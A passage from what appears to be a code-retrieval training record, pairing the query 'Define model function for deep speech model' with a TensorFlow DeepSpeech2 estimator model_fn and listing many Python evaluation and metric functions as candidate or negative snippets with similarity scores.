baselines.\n scores = scores / norm(scores)\n similar = similar / norm(similar)\n print_summary(scores, similar)", "def compare_performance(self):\n\n if self.label_type == \"categorical\":\n self._eval_classifier()\n\n elif self.label_type == \"numerical\":\n self._eval_regressor()\n\n return self.performance_comparison", "def eval_model(net, val_iter):\n correct = 0\n total = 0\n cm = conf.ConfusionMatrix([0, 1])\n net.eval()\n with torch.no_grad():\n for batch in val_iter:\n total += batch.correct.size(0)\n prediction = predict_batch(net, batch)\n cm.add_entry(batch.correct.tolist(), prediction.tolist())\n correct += (prediction == batch.correct).sum().item()\n\n return correct/total, cm.get_f1()", "def evaluate_model(model, X_test, Y_test, category_names):\n y_pred = model.predict(X_test)\n return classification_report(Y_test, y_pred, target_names = category_names)", "def evaluate_model(model, X_test, Y_test, category_names): \n \n Y_pred = model.predict(X_test)\n print(classification_report(Y_test, Y_pred))\n display_results(Y_test, Y_pred)", "def evaluate(pred_file, ref_file):\n ref_dict, pred_dict, query_dict, id_dict = build_pred_ref_dict(ref_file, pred_file, ref_file)\n total, acc, scores = res_eval_with_type_acc(query_dict, pred_dict, ref_dict, id_dict, save=False)\n em = calculate_exact_match(pred_dict, ref_dict)\n print('Comp Acc: {:.3f}%\\tBleu-4: {:.3f}\\tRouge-L: {:.3f}'.format(acc, scores['Bleu-4'], scores['Rouge-L']))\n print('EM: {:.3f}%'.format(em))\n # calculate_sketch_type_acc(ref_file, pred_file)\n # calculate_exact_match_for_each_q_type(ref_file, pred_file)\n return total, acc, scores, em", "def evaluate_model(model, X_test, Y_test, category_names): \n # predict on the X_test\n y_pred = model.predict(X_test)\n \n # build classification report on every column\n performances = []\n for i in range(len(category_names)):\n performances.append([f1_score(Y_test.iloc[:, i].values, y_pred[:, i], average='micro'),\n precision_score(Y_test.iloc[:, i].values, y_pred[:, i], average='micro'),\n recall_score(Y_test.iloc[:, i].values, y_pred[:, i], average='micro')])\n # build dataframe\n performances = pd.DataFrame(performances, columns=['f1 score', 'precision', 'recall'],\n index = category_names) \n return performances", "def evaluate(self) :\n pass", "def evaluate(data_loader, model, device):\n model.eval()\n\n loss_ = []\n with torch.no_grad():\n for idx, batch in enumerate(data_loader):\n data = batch.to(device)\n outputs = model.forward(data)\n loss_.append(F.l1_loss(outputs, data).data.numpy())\n\n return np.mean(loss_)", "def evaluate_model(args, eval_runs, warm_runs, metrics=['psnr', 'ssim', 'fps']):\n upsampler = Upsampler(args)\n if warm_runs > 0:\n print(\"Warming up for evaluation\")\n for i in range(warm_runs):\n print(\"Performing warm-up run\", str(i+1))\n for sequence in ['foliage', 'walk', 'calendar', 'city']:\n bix_dir = os.path.join(VID4_DIR, 'BIx4', sequence)\n upsampler.run_dir(bix_dir, reset=False)\n \n time = 0.\n psnrs = []\n ssims = []\n for i in range(eval_runs):\n run_psnrs = []\n run_ssims = []\n print(\"Performing evaluation run\", str(i+1))\n for sequence in ['foliage', 'walk', 'calendar', 'city']:\n bix_dir = os.path.join(VID4_DIR, 'BIx4', sequence)\n gt_dir = os.path.join(VID4_DIR, 'GT', sequence)\n print(\"Evaluating on\", bix_dir)\n time += upsampler.run_dir(bix_dir, reset=False)\n vid_psnrs, vid_ssims = _eval_sr_perf(os.path.join(bix_dir, 'up'), gt_dir)\n run_psnrs += vid_psnrs\n run_ssims += vid_ssims\n if i == eval_runs-1:\n with 
open(os.path.join(upsampler.get_model_dir(), \"psnr.txt\"), \"w\") as f:\n f.writelines(str(psnr) + '\\n' for psnr in run_psnrs)\n with open(os.path.join(upsampler.get_model_dir(), \"ssim.txt\"), \"w\") as f:\n f.writelines(str(ssim) + '\\n' for ssim in run_ssims)\n psnrs += run_psnrs\n ssims += run_ssims\n\n fps = VID4_LENGTH/ (time/eval_runs)\n return Performance(psnr=psnrs, ssim=ssims, fps=fps)", "def train_and_validate(trnK, trnY, valK, valY, Cs):\n models = []\n trn_error = []\n val_error = []\n sup_vect = []\n\n for C in Cs:\n #Training\n model = train(trnK, trnY, C)\n trn_error.append((100 - evaluate(trnK, trnY, model)) / 100)\n sup_vect.append(len(model.get_SV()))\n models.append(model)\n #Evaluate\n val_error.append((100 - evaluate(valK, valY, model)) / 100)\n return(models, trn_error, val_error, sup_vect)", "def evaluate(cfg: DictConfig):\n\n # suppress TensorFlow and DALI warnings\n suppress_warnings()\n\n if cfg.USE_MULTI_GPUS.VALUE:\n # change number of visible gpus for evaluation\n set_gpus(cfg.USE_MULTI_GPUS.GPU_IDS)\n # update batch size according to available gpus\n data_generator.update_batch_size(cfg)\n\n if cfg.OPTIMIZATION.AMP:\n print(\"Enabling Automatic Mixed Precision(AMP) training\")\n policy = mixed_precision.Policy('mixed_float16')\n mixed_precision.set_global_policy(policy)\n\n if cfg.OPTIMIZATION.XLA:\n print(\"Enabling Automatic Mixed Precision(XLA) training\")\n tf.config.optimizer.set_jit(True)\n\n # create model\n strategy = None\n if cfg.USE_MULTI_GPUS.VALUE:\n # multi gpu training using tensorflow mirrored strategy\n strategy = tf.distribute.MirroredStrategy(\n cross_device_ops=tf.distribute.HierarchicalCopyAllReduce()\n )\n print('Number of visible gpu devices: {}'.format(strategy.num_replicas_in_sync))\n with strategy.scope():\n optimizer = tf.keras.optimizers.Adam(\n learning_rate=cfg.HYPER_PARAMETERS.LEARNING_RATE\n ) # optimizer\n if cfg.OPTIMIZATION.AMP:\n optimizer = mixed_precision.LossScaleOptimizer(\n optimizer,\n dynamic=True\n )\n dice_coef = DiceCoefficient(post_processed=True, classes=cfg.OUTPUT.CLASSES)\n dice_coef = tf.keras.metrics.MeanMetricWrapper(name=\"dice_coef\", fn=dice_coef)\n model = prepare_model(cfg, training=True)\n else:\n optimizer = tf.keras.optimizers.Adam(\n learning_rate=cfg.HYPER_PARAMETERS.LEARNING_RATE\n ) # optimizer\n if cfg.OPTIMIZATION.AMP:\n optimizer = mixed_precision.LossScaleOptimizer(\n optimizer,\n dynamic=True\n )\n dice_coef = DiceCoefficient(post_processed=True, classes=cfg.OUTPUT.CLASSES)\n dice_coef = tf.keras.metrics.MeanMetricWrapper(name=\"dice_coef\", fn=dice_coef)\n model = prepare_model(cfg, training=True)\n\n model.compile(\n optimizer=optimizer,\n loss=unet3p_hybrid_loss,\n metrics=[dice_coef],\n )\n\n # weights model path\n checkpoint_path = join_paths(\n cfg.WORK_DIR,\n cfg.CALLBACKS.MODEL_CHECKPOINT.PATH,\n f\"{cfg.MODEL.WEIGHTS_FILE_NAME}.hdf5\"\n )\n\n assert os.path.exists(checkpoint_path), \\\n f\"Model weight's file does not exist at \\n{checkpoint_path}\"\n\n # TODO: verify without augment it produces same results\n # load model weights\n model.load_weights(checkpoint_path, by_name=True, skip_mismatch=True)\n model.summary()\n\n # data generators\n val_generator = data_generator.get_data_generator(cfg, \"VAL\", strategy)\n validation_steps = data_generator.get_iterations(cfg, mode=\"VAL\")\n\n # evaluation metric\n evaluation_metric = \"dice_coef\"\n if len(model.outputs) > 1:\n evaluation_metric = f\"{model.output_names[0]}_dice_coef\"\n\n result = model.evaluate(\n x=val_generator,\n 
steps=validation_steps,\n workers=cfg.DATALOADER_WORKERS,\n return_dict=True,\n )\n\n # return computed loss, validation accuracy, and it's metric name\n return result, evaluation_metric", "def evaluate_model(model, X_test, Y_test, category_names):\n y_pred = model.predict(X_test)\n # print the metrics\n for i, col in enumerate(category_names):\n print('{} category metrics: '.format(col))\n print(classification_report(Y_test.iloc[:,i], y_pred[:,i]))", "def evaluate(self):\n pass", "def evaluate(self):\n pass", "def evaluate(session, model, char_data, tag_data, dict_data, len_data, eval_op, batch_size, verbose=False):\n correct_labels = 0\n total_labels = 0\n\n xArray, yArray, dArray, lArray = reader.iterator(char_data, tag_data, dict_data, len_data, batch_size)\n yp_wordnum = 0\n yt_wordnum = 0\n cor_num = 0\n for x, y, d, l in zip(xArray, yArray, dArray, lArray):\n fetches = [model.loss, model.logits, model.trans]\n feed_dict = {}\n feed_dict[model.input_data] = x\n feed_dict[model.targets] = y\n feed_dict[model.dicts] = d\n feed_dict[model.seq_len] = l\n loss, logits, trans = session.run(fetches, feed_dict)\n\n for logits_, y_, l_ in zip(logits, y, l):\n logits_ = logits_[:l_]\n y_ = y_[:l_]\n viterbi_sequence, _ = tf.contrib.crf.viterbi_decode(logits_, trans)\n\n yp_wordnum += viterbi_sequence.count(2) + viterbi_sequence.count(3)\n yt_wordnum += (y_ == 2).sum() + (y_ == 3).sum()\n correct_labels += np.sum(np.equal(viterbi_sequence, y_))\n total_labels += l_\n\n start = 0\n for i in range(len(y_)):\n if (y_[i] == 2 or y_[i] == 3):\n flag = True\n for j in range(start, i + 1):\n if y_[j] != viterbi_sequence[j]:\n flag = False\n if flag == True:\n cor_num += 1\n start = i + 1\n P = cor_num / float(yp_wordnum)\n R = cor_num / float(yt_wordnum)\n F = 2 * P * R / (P + R)\n accuracy = 100.0 * correct_labels / float(total_labels)\n return accuracy, P, R, F", "def evaluate_pce(pc_model,pc_coeffs,germ_samples):\n\n\t# Get data set dimensions etc.\n\tn_test_samples = germ_samples.shape[0]\n\tndim = germ_samples.shape[1]\n\tnpce = pc_model.GetNumberPCTerms()\n\n\t# Put PC germ samples in a UQTk array\n\tstd_samples_uqtk = uqtkarray.dblArray2D(n_test_samples, ndim)\n\tstd_samples_uqtk.setnpdblArray(np.asfortranarray(germ_samples))\n\n\t# Numpy array to store all RVs evaluated from sampled PCEs\n\trvs_sampled = np.zeros(n_test_samples)\n\n\t# Evaluate PCE for RVs in each dimension\n\t# Create and fill UQTk array for PC coefficients\n\tc_k_1d_uqtk = uqtkarray.dblArray1D(npce,0.0)\n\tfor ip in range(npce):\n\t\tc_k_1d_uqtk[ip] = pc_coeffs[ip]\n\n\t# Create UQTk array to store outputs in\n\trv_from_pce_uqtk = uqtkarray.dblArray1D(n_test_samples,0.0)\n\n\t# Evaluate the PCEs for each input RV at those random samples\n\tpc_model.EvalPCAtCustPoints(rv_from_pce_uqtk,std_samples_uqtk,c_k_1d_uqtk)\n\n\t# Put evaluated samples in numpy array\n\tfor isamp in range(n_test_samples):\n\t\trvs_sampled[isamp] = rv_from_pce_uqtk[isamp]\n\n\t# Return numpy array of PCE evaluations\n\treturn rvs_sampled", "def evaluate_model(clf_, X_tr, X_te, y_tr, y_te, cls_rpt_tr=False, show=True, cls_labels=None, binary=False):\n \n import sklearn.metrics as metrics\n import matplotlib.pyplot as plt\n from yellowbrick.classifier import ROCAUC\n \n ## Fit and predict \n y_hat_trn, y_hat_tes = fit_n_pred(clf_, X_tr, X_te, y_tr)\n \n if show:\n ## Classification Report / Scores\n if cls_rpt_tr:\n print('Classification Report Train')\n print(metrics.classification_report(y_tr,y_hat_trn))\n else:\n print('Classification Report Test')\n 
print(metrics.classification_report(y_te,y_hat_tes))\n\n ## Confusion Matrix\n fig, ax = plt.subplots(figsize=(10,5), ncols=2)\n \n metrics.plot_confusion_matrix(clf_,X_te,y_te,cmap=\"YlOrRd\",\n normalize='true',ax=ax[0])\n ax[0].set(title='Confusion Matrix Test Data')\n ax[0].grid(False) \n\n roc = ROCAUC(clf_, classes=cls_labels, ax=ax[1])\n roc.fit(X_tr, y_tr)\n roc.score(X_te, y_te)\n roc.finalize()\n \n plt.tight_layout()\n plt.show()\n \n if binary:\n try:\n imps = plot_importance(clf_, X_tr)\n except:\n imps = None\n \n else:\n return y_hat_trn, y_hat_tes", "def _eval_classifier(self):\n\n y_pred_baseline = self.df_baseline[self.score_column]\n y_pred_sample = self.df_sample[self.score_column]\n\n y_label_baseline = self.df_baseline[self.label_column]\n y_label_sample = self.df_sample[self.label_column]\n\n precision_baseline = precision_score(y_label_baseline, y_pred_baseline)\n recall_baseline = recall_score(y_label_baseline, y_pred_baseline)\n acc_baseline = accuracy_score(y_label_baseline, y_pred_baseline)\n f1_baseline = f1_score(y_label_baseline, y_pred_baseline)\n try:\n auc_baseline = roc_auc_score(y_label_baseline, y_pred_baseline)\n except ValueError:\n auc_baseline = \"NA\"\n\n precision_sample = precision_score(y_label_sample, y_pred_sample)\n recall_sample = recall_score(y_label_sample, y_pred_sample)\n acc_sample = accuracy_score(y_label_sample, y_pred_sample)\n f1_sample = f1_score(y_label_sample, y_pred_sample)\n try:\n auc_sample = roc_auc_score(y_label_sample, y_pred_sample)\n except ValueError:\n auc_sample = \"NA\"\n\n metrics_df = pd.DataFrame(\n {\n \"Accuracy\": [acc_baseline, acc_sample],\n \"Precision\": [precision_baseline, precision_sample],\n \"Recall\": [recall_baseline, recall_sample],\n \"F1\": [f1_baseline, f1_sample],\n \"AUC\": [auc_baseline, auc_sample],\n },\n index=[\"baseline\", \"sample\"],\n )\n\n self.performance_comparison = metrics_df", "def evaluate(dataloader, model):\n with torch.no_grad():\n model.eval()\n count = 0\n correct = 0\n total_loss = 0.0\n reg_loss = 0.0\n l2_lambda = 0.00001\n criterion = nn.BCEWithLogitsLoss()\n for images_data, target_labels in tqdm(dataloader):\n if config.use_gpu:\n images_data = images_data.cuda()\n target_labels = target_labels.cuda()\n predicted_labels = model(images_data)\n total_loss += criterion(predicted_labels, target_labels)\n count += predicted_labels.shape[0]\n preds = predicted_labels.argmax(dim=1)\n targets = target_labels.argmax(dim=1)\n correct += (torch.eq(preds, targets)).sum().item()\n \n l2_reg = torch.tensor(0.)\n if config.use_gpu:\n l2_reg = l2_reg.cuda()\n for param in model.parameters():\n l2_reg += torch.norm(param)\n reg_loss += l2_lambda * l2_reg\n\n total_loss += reg_loss\n accuracy = correct * 1.0 / count\n return accuracy, total_loss.item()", "def evaluate_model(\n self,\n val_loader,\n additional_gpu=None,\n metrics=None,\n inputs_key=\"image\",\n labels_key=\"label\"\n ):\n # predict on the validation set\n all_preds = []\n all_labels = []\n\n self.model.eval()\n\n if additional_gpu is not None:\n device = additional_gpu\n else:\n device = self.device\n\n with torch.no_grad():\n for i, data in enumerate(val_loader):\n inputs, labels = data[inputs_key], data[labels_key]\n inputs = inputs.to(device)\n labels = labels.to(device)\n # forward + backward + optimize\n outputs = self.model(inputs)\n # run inference\n all_preds, all_labels = predict(\n outputs,\n labels,\n all_preds,\n all_labels,\n self.prediction_type,\n self.criterion,\n class_threshold=self.class_threshold\n 
)\n\n # compute confusion matrix\n cm = confusion_matrix(all_labels, all_preds)\n plt.imshow(cm, interpolation=\"nearest\", cmap=plt.cm.Blues)\n\n # Visualize the confusion matrix\n classes = [\"control\", \"patient\"]\n tick_marks = np.arange(len(classes))\n plt.xticks(tick_marks, classes, rotation=45)\n plt.yticks(tick_marks, classes)\n\n fmt = \"d\"\n thresh = cm.max() / 2.\n for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n plt.text(\n j,\n i,\n format(cm[i, j], fmt),\n horizontalalignment=\"center\",\n color=\"white\" if cm[i, j] > thresh else \"black\",\n )\n plt.title(\"Confusion Matrix\")\n plt.ylabel(\"True label\")\n plt.xlabel(\"Predicted label\")\n plt.show()\n\n # print metrics\n if metrics is not None:\n for metric in metrics:\n if isinstance(all_preds[0], list):\n print(\"{}: {}\".format(metric.__name__, np.mean([metric(labels, preds) for preds,labels in zip(all_preds, all_labels)])))\n else:\n print(\"{}: {}\".format(metric.__name__, metric(all_labels, all_preds)))\n\n\n self.model.train()", "def _evaluate_model(\n run_id: str, dataset_filename: str, dataset_sampling_column: str = None\n):\n fix_multiprocessing_with_keras_on_macos()\n\n run = _get_run(run_id)\n hyperparameters = run.config\n\n # no need to run this on a gpu since it's 1 epoch\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\n\n with ModelBestH5File(run) as model_h5_filepath:\n model = _load_untrainable_model(hyperparameters, model_h5_filepath)\n\n model_name = run.config[\"model_name\"]\n x, y = _get_prepared_dataset(\n model_name, hyperparameters, dataset_filename, dataset_sampling_column\n )\n\n wandb.init(\n config={\n \"run_id\": run_id,\n \"dataset_filename\": dataset_filename,\n \"dataset_sampling_column\": dataset_sampling_column,\n },\n tags=[\"model-evaluation\"],\n )\n\n batch_size = hyperparameters[\"batch_size\"]\n label_scale_factor_mmhg = hyperparameters[\"label_scale_factor_mmhg\"]\n acceptable_error_mg_l = hyperparameters[\"acceptable_error_mg_l\"]\n acceptable_fraction_outside_error = hyperparameters[\n \"acceptable_fraction_outside_error\"\n ]\n\n # we're using fit() instead of evaluate() to get the functionality of these callbacks\n # training performance in the results should be ignored, as it can be affected by some\n # training-only layers such as dropout\n model.fit(\n x,\n y,\n batch_size=batch_size,\n epochs=1,\n verbose=2,\n validation_data=(x, y),\n callbacks=[\n ThresholdValMeanAbsoluteErrorOnCustomMetric(\n acceptable_fraction_outside_error=acceptable_fraction_outside_error,\n acceptable_error_mg_l=acceptable_error_mg_l,\n ),\n WandbCallback(verbose=1, monitor=\"val_adjusted_mean_absolute_error\"),\n LogPredictionsAndWeights(\n metric=\"val_adjusted_mean_absolute_error\",\n dataset=([], [], x, y),\n label_scale_factor_mmhg=label_scale_factor_mmhg,\n ),\n ],\n )\n\n # returning model and dataset for use in jupyter notebooks\n return model, (x, y)", "def evaluate(self, train_set=\"train_set\", test_set=\"test_set\", targets=\"targets\", k=10):\n\n test_set = self.cache.fetch(test_set) if isinstance(test_set, str) else test_set\n\n # Predict\n preds = self.run(dataset=train_set, targets=targets, k=k)\n\n # Evaluate model\n print(\"evaluating model ...\")\n score = evaluate(preds, test_set)\n print(\"MAP@{}: {:.5f}\\n\".format(k, score))\n\n return score", "def eval_perf_train(model, X_train=None, y_train=None):\n\n # if X_train != None and y_train != None:\n\n y_hat_train = model.predict(X_train)\n \n train_mae = metrics.mean_absolute_error(y_train, 
y_hat_train)\n train_mse = metrics.mean_squared_error(y_train, y_hat_train)\n train_rmse = np.sqrt(metrics.mean_squared_error(y_train, y_hat_train))\n train_r = metrics.r2_score(y_train, y_hat_train)\n\n print('Evaluating Performance on Training Data:\\n')\n print(f'Train Mean Absolute Error: {train_mae:,.2f}')\n print(f'Train Mean Squared Error: {train_mse:,.2f}\\n')\n print(f'Train Root Mean Squared Error: {train_rmse:,.2f}')\n print(f'Train R-Square Value: {round(train_r,2)}')\n\n # if X_test != None and y_test != None:\n\n # y_hat_test = model.predict(X_test)\n\n # test_mae = metrics.mean_absolute_error(y_test, y_hat_test)\n # test_mse = metrics.mean_squared_error(y_test, y_hat_test)\n # test_rmse = np.sqrt(metrics.mean_squared_error(y_test, y_hat_test))\n # test_r = metrics.r2_score(y_test, y_hat_test)\n\n # print('Evaluating Performance on Testing Data:\\n')\n # print(f'Test Mean Absolute Error: {test_mae:,.2f}')\n # print(f'Test Mean Squared Error: {test_mse:,.2f}\\n')\n # print(f'Test Root Mean Squared Error: {test_rmse:,.2f}')\n # print(f'Test R-Square Value: {round(test_r,2)}')", "def compute(self) -> Any:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n device = get_device()\n for key in self.statistics:\n key_statistics = torch.tensor([self.statistics[key]], device=device)\n key_statistics = xm.all_gather(key_statistics).sum(dim=0).cpu().numpy()\n self.statistics[key] = key_statistics\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[np.ndarray] = all_gather(self.statistics[key])\n value: np.ndarray = np.sum(np.vstack(value), axis=0)\n self.statistics[key] = value\n\n per_class, micro, macro, weighted = get_aggregated_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n support=self.statistics[\"support\"],\n zero_division=self.zero_division,\n )\n if self.compute_per_class_metrics:\n return per_class, micro, macro, weighted\n else:\n return [], micro, macro, weighted", "def compute(self) -> Any:\n # ddp hotfix, could be done better\n # but metric must handle DDP on it's own\n if self._ddp_backend == \"xla\":\n device = get_device()\n for key in self.statistics:\n key_statistics = torch.tensor([self.statistics[key]], device=device)\n key_statistics = xm.all_gather(key_statistics).sum(dim=0).cpu().numpy()\n self.statistics[key] = key_statistics\n elif self._ddp_backend == \"ddp\":\n for key in self.statistics:\n value: List[np.ndarray] = all_gather(self.statistics[key])\n value: np.ndarray = np.sum(np.vstack(value), axis=0)\n self.statistics[key] = value\n\n per_class, micro, macro, weighted = get_aggregated_metrics(\n tp=self.statistics[\"tp\"],\n fp=self.statistics[\"fp\"],\n fn=self.statistics[\"fn\"],\n support=self.statistics[\"support\"],\n zero_division=self.zero_division,\n )\n if self.compute_per_class_metrics:\n return per_class, micro, macro, weighted\n else:\n return [], micro, macro, weighted", "def run_evaluate(self, test):\n accs = []\n correct_preds, total_correct, total_preds = 0., 0., 0.\n for words, labels in minibatches(test, self.config.batch_size):\n labels_pred, sequence_lengths = self.predict_batch(words)\n\n for lab, lab_pred, length in zip(labels, labels_pred,\n sequence_lengths):\n lab = lab[:length]\n lab_pred = lab_pred[:length]\n accs += [a==b for (a, b) in zip(lab, lab_pred)]\n\n lab_chunks = set(get_chunks(lab, self.config.vocab_tags))\n lab_pred_chunks = set(get_chunks(lab_pred,\n 
self.config.vocab_tags))\n\n correct_preds += len(lab_chunks & lab_pred_chunks)\n total_preds += len(lab_pred_chunks)\n total_correct += len(lab_chunks)\n\n p = correct_preds / total_preds if correct_preds > 0 else 0\n r = correct_preds / total_correct if correct_preds > 0 else 0\n f1 = 2 * p * r / (p + r) if correct_preds > 0 else 0\n acc = np.mean(accs)\n\n return {\"acc\": 100*acc, \"f1\": 100*f1}", "def evaluate_model(sess, model, data_set):\n total_cost = 0.0\n total_r_cost = 0.0\n total_kl_cost = 0.0\n for batch in range(data_set.num_batches):\n unused_orig_x, x, s = data_set.get_batch(batch)\n feed = {model.input_data: x, model.sequence_lengths: s}\n (cost, r_cost,\n kl_cost) = sess.run([model.cost, model.r_cost, model.kl_cost], feed)\n total_cost += cost\n total_r_cost += r_cost\n total_kl_cost += kl_cost\n\n total_cost /= (data_set.num_batches)\n total_r_cost /= (data_set.num_batches)\n total_kl_cost /= (data_set.num_batches)\n return (total_cost, total_r_cost, total_kl_cost)", "def evaluate(model, data_pars=None, compute_pars=None, out_pars=None, **kw):\n ddict = {}\n \n return ddict", "def evaluate(self,X,Y):\n from sklearn import metrics\n Y_pred = [self.crf_model.tag(xseq) for xseq in X]\n lb = LabelBinarizer()\n y_true_combined = lb.fit_transform(list(chain.from_iterable(Y)))\n\n labels = list(lb.classes_)\n print(labels)\n # labels = list(self.crf_model.classes_)\n labels.remove('O')\n Y_pred_flat = [item for sublist in Y_pred for item in sublist]\n Y_flat = [item for sublist in Y for item in sublist]\n print(metrics.classification_report(Y_pred_flat, Y_flat,labels))", "def calculate_metrics(self):\n \n for cv in self.cat_vals:\n cat_inds = np.where(self.category_values == cv)[0]\n weighted_difference = (self.z[cat_inds]-self.mz[cat_inds])/self.weight_values[cat_inds]\n resid = np.sqrt(np.sum(np.square(weighted_difference))/(cat_inds.size))\n self.metric[str(cv)] = resid\n \n return self.metric", "def run_evaluate(self, test):\n accs = []\n correct_preds, total_correct, total_preds = 0., 0., 0.\n for words, labels in minibatches(test, self.config.batch_size):\n labels_pred, sequence_lengths = self.predict_batch(words)\n\n for lab, lab_pred, length in zip(labels, labels_pred,\n sequence_lengths):\n lab = lab[:length]\n lab_pred = lab_pred[:length]\n accs += [a==b for (a, b) in zip(lab, lab_pred)]\n\n lab_chunks = set(get_chunks(lab, self.config.vocab_tags))\n lab_pred_chunks = set(get_chunks(lab_pred,\n self.config.vocab_tags))\n\n correct_preds += len(lab_chunks & lab_pred_chunks)\n total_preds += len(lab_pred_chunks)\n total_correct += len(lab_chunks)\n\n p = correct_preds / total_preds if correct_preds > 0 else 0\n r = correct_preds / total_correct if correct_preds > 0 else 0\n f1 = 2 * p * r / (p + r) if correct_preds > 0 else 0\n acc = np.mean(accs)\n print('*'*20, '\\n')\n print('precision:', p, 'recall:', r, 'f1:', f1, '\\n')\n print('*'*20)\n\n return {\"acc\": 100*acc, \"f1\": 100*f1}", "def evaluate(ner_model, examples):\n # The Scorer computes and stores evaluation scores\n scorer = Scorer()\n for text, annotations in examples:\n # Process the text to get entities predicted\n document = ner_model.make_doc(text)\n correct_annotations = GoldParse(document, entities=annotations['entities'])\n predicted_annotations = ner_model(text)\n # Update the evaluation scores from the document\n scorer.score(predicted_annotations, correct_annotations)\n return scorer.scores", "def evaluate(self):\n predictions = self.model.predict(self.test[0])\n accuracy = 
accuracy_score(self.test[1], predictions)\n print(\"Accuracy:\", str(accuracy * 100) + \"%\")\n self.plot_results(predictions)", "def eval_model(self, model):\n evaluation = model.evaluate(x=self.xt_test, y=self.yt_test)\n print(\"loss : \" + str(round(evaluation[0]*100, 2)) + \"%\")\n print(\"accuracy: \" + str(round(evaluation[1]*100, 2)) + \"%\")", "def test(model, queue, device):\n logger.info('test() start')\n total_dist = 0\n total_length = 0\n total_sent_num = 0\n time_step = 0\n\n model.eval()\n\n with torch.no_grad():\n while True:\n feats, targets, feat_lengths, script_lengths = queue.get()\n if feats.shape[0] == 0:\n break\n\n feats = feats.to(device)\n targets = targets.to(device)\n target = targets[:, 1:]\n\n model.flatten_parameters()\n y_hat, _ = model(feats, targets, teacher_forcing_ratio = 1.0, use_beam_search = False)\n dist, length = get_distance(target, y_hat, id2char, EOS_TOKEN)\n total_dist += dist\n total_length += length\n total_sent_num += target.size(0)\n if time_step % 10 == 0:\n logger.info('cer: {:.2f}'.format(dist / length))\n time_step += 1\n\n CER = total_dist / total_length\n logger.info('test() completed')\n\n return CER" ]
[ "0.61214685", "0.6103847", "0.6043671", "0.59896857", "0.5839277", "0.5747045", "0.5735802", "0.5731427", "0.57268673", "0.5685036", "0.56741154", "0.56643283", "0.5655421", "0.565319", "0.56433403", "0.56417257", "0.56286067", "0.56258726", "0.56154364", "0.5613228", "0.5611205", "0.5610551", "0.5604053", "0.5603191", "0.5548799", "0.5540959", "0.55302536", "0.5521474", "0.5518882", "0.551811", "0.5517933", "0.551386", "0.55014735", "0.5488437", "0.548814", "0.5484374", "0.54736936", "0.5457942", "0.5445424", "0.5445124", "0.5440153", "0.5430675", "0.5418318", "0.5411879", "0.5407843", "0.54039484", "0.5401198", "0.5386371", "0.53851897", "0.5379692", "0.53772146", "0.53677565", "0.5364756", "0.536257", "0.5353945", "0.53522587", "0.535129", "0.5349366", "0.5345418", "0.5344146", "0.53404516", "0.5331169", "0.5329892", "0.53291", "0.53161365", "0.531511", "0.5313613", "0.53113276", "0.53102356", "0.53081834", "0.5305271", "0.5301433", "0.5298375", "0.52977234", "0.52949786", "0.5294748", "0.5294527", "0.5293006", "0.5293006", "0.529124", "0.52861935", "0.5284614", "0.52817905", "0.52813786", "0.52808064", "0.5280238", "0.5263137", "0.5262241", "0.5259468", "0.5259468", "0.5259365", "0.52543616", "0.52492326", "0.524832", "0.52480745", "0.5246349", "0.5245682", "0.5243406", "0.52384496", "0.5235308" ]
0.5991093
3
Define model function for deep speech model.
def model_fn(features: Dict, labels, mode, params: Dict): global FLAGS num_classes = params["num_classes"] input_length = features["input_length"] label_length = features["label_length"] features = features["features"] # Create model model = deep_speech_model.DeepSpeech2( num_rnn_layers=FLAGS.rnn_hidden_layers, rnn_type=FLAGS.rnn_type, is_bidirectional=FLAGS.is_bidirectional, rnn_hidden_size=FLAGS.rnn_hidden_size, num_classes=num_classes, use_bias=FLAGS.use_bias) # predict mode if mode == es.ModeKeys.PREDICT: logits = model(features, training=False) predictions = { "logits": logits, "classes": tf.argmax(logits, axis=2), "probabilities": tf.nn.softmax(logits) } return es.EstimatorSpec(mode=mode, predictions=predictions) # train / eval mode logits = model(features, training=True) probs = tf.nn.softmax(logits) ctc_input_length = compute_length_after_conv(tf.shape(features)[1], tf.shape(probs)[1], input_length) loss = tf.reduce_mean( ctc_loss(label_length=label_length, ctc_input_length=ctc_input_length, labels=labels, probs=probs)) opt = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate) global_step = tf.train.get_or_create_global_step() minimize_op = opt.minimize(loss, global_step=global_step) update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS) train_op = tf.group(minimize_op, update_ops) return es.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_model_fn(self):", "def build_model():", "def model_fn(self, features, labels, mode, params, config):\n raise NotImplementedError()", "def load_deepspeech(model_name):\n\n # For reference:\n # from deepspeech_pytorch.model import DeepSpeech\n # from torch.utils.model_zoo import load_url\n # import torch.onnx\n\n # pretrained_url = 'https://github.com/SeanNaren/deepspeech.pytorch/releases/download/v2.0/an4_pretrained_v2.pth'\n # params = load_url(pretrained_url)\n # model = DeepSpeech.load_model_package(params)\n # model.eval()\n # input_sizes = (1, 1, 161, 753)\n # input_data = torch.randn(*input_sizes).float()\n # input_sizes = torch.IntTensor([161]).int()\n # model(input_data, input_sizes)\n # return model, [input_data, input_sizes]\n\n raise NotImplementedError(\"TVM pytorch frontend doesn't support all the required \"\n \"operators for this model.\")", "def create_model(self):\r\n model = self.model_fn(self.flags)\r\n print(model)\r\n return model", "def build_model(self):\n doc_input = Input(shape=(self.max_sent_num ,self.max_sent_length,512), dtype='float32')\n doc_in=Flatten()(doc_input)\n \n #masked3=Masking(mask_value=Special_value)(doc_input)\n \n # self.model_sent = self.build_sent_encoder()\n \n # doc_encoder= TimeDistributed(self.model_sent)(doc_in)\n \n # document_att= self.build_doc_encoder(doc_encoder)\n dense= Dense(DENSE_SIZE,activation='softmax')(doc_in)\n #doc_att = self.build_sent_encoder(sent_encoder)\n # dense the output to 2 because the result is a binary classification.\n output_tensor = Dense(3, activation='softmax', name='classification')(dense)\n # Create Sentence-level Model\n self.model = Model(doc_input, output_tensor)", "def build_model(self) -> nn.Module:\n pass", "def __init__(self, params, model, name=\"ds2_encoder\", mode='train'):\n super(DeepSpeech2Encoder, self).__init__(params, model, name, mode)", "def speech_recog(event, context):\n 